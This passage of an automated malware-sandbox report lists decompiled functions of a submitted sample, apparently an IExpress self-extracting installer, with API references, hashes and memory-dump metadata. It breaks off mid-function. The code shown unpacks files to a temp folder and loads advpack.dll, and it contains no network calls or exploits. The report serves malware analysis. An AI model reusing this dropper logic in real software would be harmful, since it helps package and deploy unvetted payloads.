                                                                                                                                                                                                    0x0039651f
                                                                                                                                                                                                    0x0039652a
                                                                                                                                                                                                    0x00396534
                                                                                                                                                                                                    0x0039656b
                                                                                                                                                                                                    0x00396577
                                                                                                                                                                                                    0x0039657c
                                                                                                                                                                                                    0x0039657c
                                                                                                                                                                                                    0x00396536
                                                                                                                                                                                                    0x0039653e
                                                                                                                                                                                                    0x00396542
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396544
                                                                                                                                                                                                    0x00396547
                                                                                                                                                                                                    0x0039654c
                                                                                                                                                                                                    0x00396549
                                                                                                                                                                                                    0x00396549
                                                                                                                                                                                                    0x00396549
                                                                                                                                                                                                    0x0039655e
                                                                                                                                                                                                    0x00396560
                                                                                                                                                                                                    0x00396569
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00396569
                                                                                                                                                                                                    0x00396542
                                                                                                                                                                                                    0x00396587

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00390000,000007D6,00000005), ref: 0039652A
                                                                                                                                                                                                    • LoadResource.KERNEL32(00390000,00000000,?,?,00392EE8,00000000,003919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00396538
                                                                                                                                                                                                    • DialogBoxIndirectParamA.USER32(00390000,00000000,00000547,003919E0,00000000), ref: 00396557
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00392EE8,00000000,003919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00396560
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                    • String ID: .9
                                                                                                                                                                                                    • API String ID: 1214682469-2956137912
                                                                                                                                                                                                    • Opcode ID: 892839fc15fbc64bd582d138dc823e7aa855c74c77c35e564a7b123f76ae693d
                                                                                                                                                                                                    • Instruction ID: 3044c7a9efac419497f9a1694b33c26200ffcc7d6da27d5fda7b742d10446657
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 892839fc15fbc64bd582d138dc823e7aa855c74c77c35e564a7b123f76ae693d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4601F972101A15BBDF126F6A9C49DBB7A6CEB8A761F02022AFE1093154D772CD10C6E1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                    			E00396495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				signed char _t14;
                                                                                                                                                                                                    				struct HINSTANCE__* _t15;
                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                    				CHAR* _t26;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t27 = __esi;
                                                                                                                                                                                                    				_t18 = __ebx;
                                                                                                                                                                                                    				_t9 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				E00391781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                    				_t26 = "advpack.dll";
                                                                                                                                                                                                    				E0039658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                    				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                    					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00396CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                    			}
                                                                                                                                                                                                    0x00396495
                                                                                                                                                                                                    0x00396495
                                                                                                                                                                                                    0x003964a0
                                                                                                                                                                                                    0x003964a7
                                                                                                                                                                                                    0x003964ab
                                                                                                                                                                                                    0x003964bd
                                                                                                                                                                                                    0x003964c2
                                                                                                                                                                                                    0x003964d3
                                                                                                                                                                                                    0x003964df
                                                                                                                                                                                                    0x003964e8
                                                                                                                                                                                                    0x00396502
                                                                                                                                                                                                    0x003964ee
                                                                                                                                                                                                    0x003964f9
                                                                                                                                                                                                    0x003964f9
                                                                                                                                                                                                    0x00396516

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 003964DF
                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 003964F9
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00396502
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                                    • API String ID: 438848745-3761280616
                                                                                                                                                                                                    • Opcode ID: 2be10cac96241d5ce4d832cf8faaa22c84c422008bc04b8fc2e1f420f9904587
                                                                                                                                                                                                    • Instruction ID: e2431ad4ddcf085368ed41f0c770c43e4a1f55dec724cf13c3f4862eabeef407
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2be10cac96241d5ce4d832cf8faaa22c84c422008bc04b8fc2e1f420f9904587
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C801F930501108ABDF12DB64DC46FEE737CEB56311F510296F589961D0DF709E85CA51
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                    			E00394169(void* __eflags) {
                                                                                                                                                                                                    				int _t18;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t20 = E0039468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                    				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                    					if(E0039468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                    						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                    							return LocalFree(_t21);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						_push(0x40);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						_push(_t21);
                                                                                                                                                                                                    						_t18 = 0x3e9;
                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                    						E003944B9(0, _t18);
                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0x10);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_t18 = 0x4b1;
                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E003944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946A0
                                                                                                                                                                                                      • Part of subcall function 0039468F: SizeofResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946A9
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946C3
                                                                                                                                                                                                      • Part of subcall function 0039468F: LoadResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946CC
                                                                                                                                                                                                      • Part of subcall function 0039468F: LockResource.KERNEL32(00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946D3
                                                                                                                                                                                                      • Part of subcall function 0039468F: memcpy_s.MSVCRT ref: 003946E5
                                                                                                                                                                                                      • Part of subcall function 0039468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003946EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,003930B4), ref: 00394189
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,003930B4), ref: 003941E7
                                                                                                                                                                                                      • Part of subcall function 003944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
                                                                                                                                                                                                      • Part of subcall function 003944B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$FINISHMSG
                                                                                                                                                                                                    • API String ID: 3507850446-3091758298
                                                                                                                                                                                                    • Opcode ID: d4760706e9fc5277fb567cc681d6b15c025500e53dac47d0344ec88dd1b97ac7
                                                                                                                                                                                                    • Instruction ID: 6fd0e1f4f6fcaa00d6c1bce08d31fb6ec80c65e874f94be1c7a5cb5c7357db8d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4760706e9fc5277fb567cc681d6b15c025500e53dac47d0344ec88dd1b97ac7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E001FFFA3002253BFF27266A4C86F7B218EDBD5795F014126B706E62809AA9CC0241B5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00397155() {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				struct _FILETIME _v16;
                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                    				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                    				signed int _t37;
                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                    				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                    				_t23 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                    					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                    					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                    					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                    					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                    					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                    					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                    					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                    					_t39 = _t36;
                                                                                                                                                                                                    					if(_t36 == 0xbb40e64e || ( *0x398004 & 0xffff0000) == 0) {
                                                                                                                                                                                                    						_t36 = 0xbb40e64f;
                                                                                                                                                                                                    						_t39 = 0xbb40e64f;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0x398004 = _t39;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t37 =  !_t36;
                                                                                                                                                                                                    				 *0x398008 = _t37;
                                                                                                                                                                                                    				return _t37;
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00397182
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00397191
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0039719A
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 003971A3
                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 003971B8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1445889803-0
                                                                                                                                                                                                    • Opcode ID: 1658b4f99bb06d1c51d0f27eeca300d974fa5b6f9efb58522d5bc6f63bfdd9da
                                                                                                                                                                                                    • Instruction ID: 982e9384b4a1ad0e5044fd1e100fa0bf3154215e3c53b0cae469dd4e0b771683
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1658b4f99bb06d1c51d0f27eeca300d974fa5b6f9efb58522d5bc6f63bfdd9da
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3114C71D11608EFCF11DFB8DA48A9EB7F8EF48315F614956D801E7250EB319A04CB41
                                                                                                                                                                                                    Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
E003919E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
	signed int _v8;
	char _v520;
	void* __esi;
	signed int _t11;
	void* _t14;
	void* _t23;
	void* _t27;
	void* _t33;
	struct HWND__* _t34;
	signed int _t35;

	_t33 = __edi;
	_t27 = __ebx;
	_t11 =  *0x398004; // 0x74c05eb4
	_v8 = _t11 ^ _t35;
	_t34 = _a4;
	_t14 = _a8 - 0x110;
	if(_t14 == 0) {
		_t32 = GetDesktopWindow();
		E003943D0(_t34, _t15);
		_v520 = 0;
		LoadStringA( *0x399a3c, _a16,  &_v520, 0x200);
		SetDlgItemTextA(_t34, 0x83f,  &_v520);
		MessageBeep(0xffffffff);
		goto L6;
	} else {
		if(_t14 != 1) {
			L4:
			_t23 = 0;
		} else {
			_t32 = _a12;
			if(_t32 - 0x83d > 1) {
				goto L4;
			} else {
				EndDialog(_t34, _t32);
				L6:
				_t23 = 1;
			}
		}
	}
	return E00396CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
}

0x003919e0
0x003919e0
0x003919eb
0x003919f2
0x003919f9
0x003919fc
0x00391a01
0x00391a2a
0x00391a2e
0x00391a3e
0x00391a4f
0x00391a62
0x00391a6a
0x00000000
0x00391a03
0x00391a06
0x00391a20
0x00391a20
0x00391a08
0x00391a08
0x00391a14
0x00000000
0x00391a16
0x00391a18
0x00391a70
0x00391a72
0x00391a72
0x00391a14
0x00391a06
0x00391a81

APIs
• EndDialog.USER32(?,?), ref: 00391A18
• GetDesktopWindow.USER32 ref: 00391A24
• LoadStringA.USER32(?,?,00000200), ref: 00391A4F
• SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00391A62
• MessageBeep.USER32(000000FF), ref: 00391A6A
Memory Dump Source
• Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
Similarity
• API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
• String ID:
• API String ID: 1273765764-0
• Opcode ID: a14578774409f4e88c28c443d04cc116572b72ac399ad452c174260d947839c1
• Instruction ID: e4212a9a3bc501bc1c8b5b15157e83d9ab01466afdbe4c073e612a5a9baa3bc5
• Opcode Fuzzy Hash: a14578774409f4e88c28c443d04cc116572b72ac399ad452c174260d947839c1
• Instruction Fuzzy Hash: 3A11C43260110AAFDF12EF68ED09AAE77BCEF49300F108256F912E7190DA319E11CBD5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%
E003963C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
	signed int _v8;
	char _v268;
	long _v272;
	void* _v276;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t15;
	long _t28;
	struct _OVERLAPPED* _t37;
	void* _t39;
	signed int _t40;

	_t15 =  *0x398004; // 0x74c05eb4
	_v8 = _t15 ^ _t40;
	_v272 = _v272 & 0x00000000;
	_push(__ecx);
	_v276 = _a16;
	_t37 = 1;
	E00391781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
	E0039658A( &_v268, 0x104, _a12);
	_t28 = 0;
	_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
	if(_t39 != 0xffffffff) {
		_t28 = _a4;
		if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
			 *0x399124 = 0x80070052;
			_t37 = 0;
		}
		CloseHandle(_t39);
	} else {
		 *0x399124 = 0x80070052;
		_t37 = 0;
	}
	return E00396CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
}
Statement addresses (address column of the listing above, flattened by extraction): 0x003963cb, 0x003963d2, 0x003963d8, 0x003963ea, 0x003963f3, 0x00396401, 0x00396402, 0x00396410, 0x00396415, 0x00396433, 0x00396438, 0x00396449, 0x00396463, 0x0039646d, 0x00396477, 0x00396477, 0x0039647a, 0x0039643a, 0x0039643a, 0x00396444, 0x00396444, 0x00396492

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0039642D
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0039645B
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0039647A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003963EB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                    • API String ID: 1065093856-1116576409
                                                                                                                                                                                                    • Opcode ID: 33da512aae4cf4872f3d59c7b3a1246af4c00f7907a3bad320f15b3835687ecb
                                                                                                                                                                                                    • Instruction ID: f147731c054ca56e473350979d0c965d1eab8d9f68154286064b13f5e30031c1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33da512aae4cf4872f3d59c7b3a1246af4c00f7907a3bad320f15b3835687ecb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9421D871A0111CAFDB12DF65DC86FEB737CEB49314F00416AF545A7240DAB15D848FA4
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E003947E0(intOrPtr* __ecx) {
                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                                                                                    				void _t24;
                                                                                                                                                                                                    				struct HWND__* _t25;
                                                                                                                                                                                                    				struct HWND__* _t26;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                    				intOrPtr* _t33;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t33 = __ecx;
                                                                                                                                                                                                    				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                                                    					_t22 = _t33;
                                                                                                                                                                                                    					_t27 = _t22 + 1;
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t6 =  *_t22;
                                                                                                                                                                                                    						_t22 = _t22 + 1;
                                                                                                                                                                                                    					} while (_t6 != 0);
                                                                                                                                                                                                    					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                    					 *_t34 = _t24;
                                                                                                                                                                                                    					if(_t24 != 0) {
                                                                                                                                                                                                    						_t28 = _t33;
                                                                                                                                                                                                    						_t19 = _t28 + 1;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t9 =  *_t28;
                                                                                                                                                                                                    							_t28 = _t28 + 1;
                                                                                                                                                                                                    						} while (_t9 != 0);
                                                                                                                                                                                                    						E00391680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                    						_t11 =  *0x3991e0; // 0x2a78eb0
                                                                                                                                                                                                    						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                    						 *0x3991e0 = _t34;
                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t25 =  *0x398584; // 0x0
                                                                                                                                                                                                    					E003944B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                    					LocalFree(_t34);
                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t26 =  *0x398584; // 0x0
                                                                                                                                                                                                    				E003944B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                                    			}
Statement addresses (address column of the listing above, flattened by extraction): 0x003947e8, 0x003947f0, 0x003947f4, 0x0039480f, 0x00394811, 0x00394814, 0x00394814, 0x00394816, 0x00394817, 0x00394829, 0x0039482b, 0x0039482f, 0x0039484f, 0x00394852, 0x00394855, 0x00394855, 0x00394857, 0x00394858, 0x00394860, 0x00394865, 0x0039486a, 0x0039486f, 0x00000000, 0x00394876, 0x00394831, 0x00394841, 0x00394847, 0x0039480b, 0x00000000, 0x0039480b, 0x003947f6, 0x00394806, 0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00394E6F), ref: 003947EA
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00394823
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00394847
                                                                                                                                                                                                      • Part of subcall function 003944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
                                                                                                                                                                                                      • Part of subcall function 003944B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00394851
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
• Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                    • API String ID: 359063898-1116576409
                                                                                                                                                                                                    • Opcode ID: 5850a8155ff4b6c5bfc617ac4e4f4a2220814d80ceb9f6ef5819d86b9ea32943
                                                                                                                                                                                                    • Instruction ID: 2613b5bde3e8f326bd80ddc982f5d82e84b38e76efd8cec5c4475a183e2bc103
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5850a8155ff4b6c5bfc617ac4e4f4a2220814d80ceb9f6ef5819d86b9ea32943
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D911E5756086426FEF279F24AC18F773B5EEBC6300F05855AFA829B351DA378C078660
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00393680(void* __ecx) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				struct tagMSG _v36;
                                                                                                                                                                                                    				int _t8;
                                                                                                                                                                                                    				struct HWND__* _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v8 = __ecx;
                                                                                                                                                                                                    				_t16 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							if(_v36.message != 0x12) {
                                                                                                                                                                                                    								DispatchMessageA( &_v36);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t16 = 1;
                                                                                                                                                                                                    							}
